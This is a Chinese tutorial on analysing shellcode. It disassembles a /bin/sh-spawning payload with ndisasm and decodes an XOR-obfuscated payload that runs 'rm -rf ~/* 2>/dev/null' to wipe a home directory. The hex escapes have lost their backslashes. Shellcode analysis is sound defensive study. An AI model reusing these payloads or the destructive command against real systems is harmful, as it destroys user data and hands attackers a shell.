下面,我们将分析几个已有的shellcode的功能,通过分析,了解shellcode分析的技巧。第一个shellcode代码如下:
- static char shellcode[]=
- "xebx17x5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89"
- "xf3x8dx4ex08x31xd2xcdx80xe8xe4xffxffxffx2fx62x69x6e"
- "x2fx73x68x58";
|
使用ndisasm反汇编结果如下:
- root@linux:~/pentest# echo -ne "xebx17x5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8dx4ex08x31xd2xcdx80xe8xe4xffxffxffx2fx62x69x6ex2fx73x68x58" | ndisasm -u -
- 00000000 EB17 jmp short 0x19
- 00000002 5E pop esi
- 00000003 897608 mov [esi+0x8],esi
- 00000006 31C0 xor eax,eax
- 00000008 884607 mov [esi+0x7],al
- 0000000B 89460C mov [esi+0xc],eax
- 0000000E B00B mov al,0xb
- 00000010 89F3 mov ebx,esi
- 00000012 8D4E08 lea ecx,[esi+0x8]
- 00000015 31D2 xor edx,edx
- 00000017 CD80 int 0x80
- 00000019 E8E4FFFFFF call dword 0x2
- 0000001E 2F das
- 0000001F 62696E bound ebp,[ecx+0x6e]
- 00000022 2F das
- 00000023 7368 jnc 0x8d
- 00000025 58 pop eax
- root@linux:~/pentest#
|
可以看出,这是一个执行“/bin/sh”的shellcode。第二个shellcode代码如下:
- char shellcode2[] =
- "xebx10x5ex31xc9xb1x4bxb0xffx30x06xfexc8x46xe2xf9"
- "xebx05xe8xebxffxffxffx17xdbxfdxfcxfbxd5x9bx91x99"
- "xd9x86x9cxf3x81x99xf0xc2x8dxedx9ex86xcaxc4x9ax81"
- "xc6x9bxcbxc9xc2xd3xdexf0xbaxb8xaaxf4xb4xacxb4xbb"
- "xd6x88xe5x13x82x5cx8dxc1x9dx40x91xc0x99x44x95xcf"
- "x95x4cx2fx4ax23xf0x12x0fxb5x70x3cx32x79x88x78xf7"
- "x7bx35";
|
下面使用ndisasm反汇编,结果如下:
- root@linux:~/pentest# echo -ne
- "xebx10x5ex31xc9xb1x4bxb0xffx30x06xfexc8x46xe2xf9xebx05xe8xebxffxffxffx17xdbxfdxfcxfbxd5x9bx91x99xd9x86x9cxf3x81x99xf0xc2x8dxedx9ex86xcaxc4x9ax81xc6x9bxcbxc9xc2xd3xdexf0xbaxb8xaaxf4xb4xacxb4xbbxd6x88xe5x13x82x5cx8dxc1x9dx40x91xc0x99x44x95xcfx95x4cx2fx4ax23xf0x12x0fxb5x70x3cx32x79x88x78xf7x7bx35" | ndisasm -u -
- 00000000 EB10 jmp short 0x12
- 00000002 5E pop esi
- 00000003 31C9 xor ecx,ecx
- 00000005 B14B mov cl,0x4b
- 00000007 B0FF mov al,0xff
- 00000009 3006 xor [esi],al
- 0000000B FEC8 dec al
- 0000000D 46 inc esi
- 0000000E E2F9 loop 0x9
- 00000010 EB05 jmp short 0x17
- 00000012 E8EBFFFFFF call dword 0x2
- 00000017 17 pop ss
- 00000018 DB db 0xdb
- 00000019 FD std
- 0000001A FC cld
- 0000001B FB sti
- 0000001C D59B aad 0x9b
- 0000001E 91 xchg eax,ecx
- 0000001F 99 cdq
- 00000020 D9869CF38199 fld dword [esi-0x667e0c64]
- 00000026 F0C28DED lock ret 0xed8d
- 0000002A 9E sahf
- 0000002B 86CA xchg cl,dl
- 0000002D C49A81C69BCB les ebx,[edx-0x3464397f]
- 00000033 C9 leave
- 00000034 C2D3DE ret 0xded3
- 00000037 F0BAB8AAF4B4 lock mov edx,0xb4f4aab8
- 0000003D AC lodsb
- 0000003E B4BB mov ah,0xbb
- 00000040 D6 salc
- 00000041 88E5 mov ch,ah
- 00000043 13825C8DC19D adc eax,[edx-0x623e72a4]
- 00000049 40 inc eax
- 0000004A 91 xchg eax,ecx
- 0000004B C0994495CF954C rcr byte [ecx-0x6a306abc],0x4c
- 00000052 2F das
- 00000053 4A dec edx
- 00000054 23F0 and esi,eax
- 00000056 120F adc cl,[edi]
- 00000058 B570 mov ch,0x70
- 0000005A 3C32 cmp al,0x32
- 0000005C 7988 jns 0xffffffe6
- 0000005E 78F7 js 0x57
- 00000060 7B35 jpo 0x97
- root@linux:~/pentest#
|
接下来,我们将使用一个python脚本和hexdump来分析这个shellcode。
- root@linux:~/pentest# cat decode.py
- #!/usr/bin/env python
- sc = "xebx10x5ex31xc9xb1x4bxb0xffx30x06xfexc8x46xe2xf9" +
- "xebx05xe8xebxffxffxffx17xdbxfdxfcxfbxd5x9bx91x99" +
- "xd9x86x9cxf3x81x99xf0xc2x8dxedx9ex86xcaxc4x9ax81" +
- "xc6x9bxcbxc9xc2xd3xdexf0xbaxb8xaaxf4xb4xacxb4xbb" +
- "xd6x88xe5x13x82x5cx8dxc1x9dx40x91xc0x99x44x95xcf" +
- "x95x4cx2fx4ax23xf0x12x0fxb5x70x3cx32x79x88x78xf7" +
- "x7bx35"
- print "".join([chr((ord(x)^(0xff-i))) for i,x in enumerate(sc[0x17:])])
- root@linux:~/pentest# ./decode.py | hexdump -C
- 00000000 e8 25 00 00 00 2f 62 69 6e 2f 73 68 00 73 68 00 |.%.../bin/sh.sh.|
- 00000010 2d 63 00 72 6d 20 2d 72 66 20 7e 2f 2a 20 32 3e |-c.rm -rf ~/* 2>|
- 00000020 2f 64 65 76 2f 6e 75 6c 6c 00 5d 31 c0 50 8d 5d |/dev/null.]1.P.]|
- 00000030 0e 53 8d 5d 0b 53 8d 5d 08 53 89 eb 89 e1 31 d2 |.S.].S.].S....1.|
- 00000040 b0 0b cd 80 89 c3 31 c0 40 cd 80 0a |......1.@...|
- 0000004c
- root@linux:~/pentest#
|
可以看到“/bin/sh”“sh”“rm –rf ~/* 2>/dev/null”几条指令,接下来我们使用ndisasm分析:
- root@linux:~/pentest# ./decode.py | ndisasm -u -
- 00000000 E825000000 call dword 0x2a
- 00000005 2F das
- 00000006 62696E bound ebp,[ecx+0x6e]
- 00000009 2F das
- 0000000A 7368 jnc 0x74
- 0000000C 007368 add [ebx+0x68],dh
- 0000000F 002D6300726D add [dword 0x6d720063],ch
- 00000015 202D7266207E and [dword 0x7e206672],ch
- 0000001B 2F das
- 0000001C 2A20 sub ah,[eax]
- 0000001E 323E xor bh,[esi]
- 00000020 2F das
- 00000021 6465762F gs jna 0x54
- 00000025 6E outsb
- 00000026 756C jnz 0x94
- 00000028 6C insb
- 00000029 005D31 add [ebp+0x31],bl
- 0000002C C0508D5D rcl byte [eax-0x73],0x5d
- 00000030 0E push cs
- 00000031 53 push ebx
- 00000032 8D5D0B lea ebx,[ebp+0xb]
- 00000035 53 push ebx
- 00000036 8D5D08 lea ebx,[ebp+0x8]
- 00000039 53 push ebx
- 0000003A 89EB mov ebx,ebp
- 0000003C 89E1 mov ecx,esp
- 0000003E 31D2 xor edx,edx
- 00000040 B00B mov al,0xb
- 00000042 CD80 int 0x80
- 00000044 89C3 mov ebx,eax
- 00000046 31C0 xor eax,eax
- 00000048 40 inc eax
- 00000049 CD80 int 0x80
- 0000004B 0A db 0x0a
- root@linux:~/pentest#
|
易网时代-编程资源站